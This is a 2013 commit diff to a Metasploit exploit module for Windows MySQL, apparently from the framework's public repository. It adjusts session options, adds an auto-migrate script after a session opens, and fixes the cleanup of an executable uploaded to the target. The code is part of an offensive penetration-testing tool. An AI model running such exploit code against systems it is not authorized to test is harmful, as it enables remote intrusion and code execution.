Couple of minor fixes and steps towards payload cleanup.

2013-07-25 21:37:17 -04:00 · 2013-07-25 21:37:17 -04:00 · 7bbdc8c0dc
parent b362ae8ae3
commit 7bbdc8c0dc
1 changed files with 9 additions and 5 deletions
--- a/modules/exploits/windows/mysql/mysql_start_up.rb
+++ b/modules/exploits/windows/mysql/mysql_start_up.rb
@ -28,6 +28,10 @@ class Metasploit3 < Msf::Exploit::Remote
 					'sinn3r',
 					'Sean Verity <veritysr1980[at]gmail.com'
 				],
+			'DefaultOptions' =>
+				{
+					'InitialAutoRunScript' => "migrate -f"
+				},
 			'License'        => MSF_LICENSE,
 			'References'     =>
 				[
@ -45,6 +49,10 @@ class Metasploit3 < Msf::Exploit::Remote
 				OptString.new('USERNAME', [ true, 'The username to authenticate as']),
 				OptString.new('PASSWORD', [ true, 'The password to authenticate with'])
 			])
+		register_advanced_options(
+			[
+				OptBool.new('ExitOnSession', [ false, 'Turn off handler once session is created', true])
+			])
 	end

 	def check
@ -113,13 +121,12 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("#{peer} - Uploading to '#{dest}'")
 		begin
 			upload_file(exe, dest)
-			register_file_for_cleanup("#{exe_name}")
+			register_file_for_cleanup("#{dest}")
 		rescue RbMysql::AccessDeniedError
 			print_error("#{peer} - No permission to write. I blame kc :-)")
 			return
 		end

-
 		if not datastore['ExitOnSession'] and not job_id
 			fail_with(Exploit::Failure::Unknown, "Setting ExitOnSession to false requires running as a job (exploit -j)")
 		end
@ -129,11 +136,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		while(true)
 			break if session_created? and datastore['ExitOnSession']
 			break if ( datastore['ListenerTimeout'].to_i > 0 and (stime + datastore['ListenerTimeout'].to_i < Time.now.to_f) )
-
 			select(nil,nil,nil,1)
 		end
-
-
 	end

 end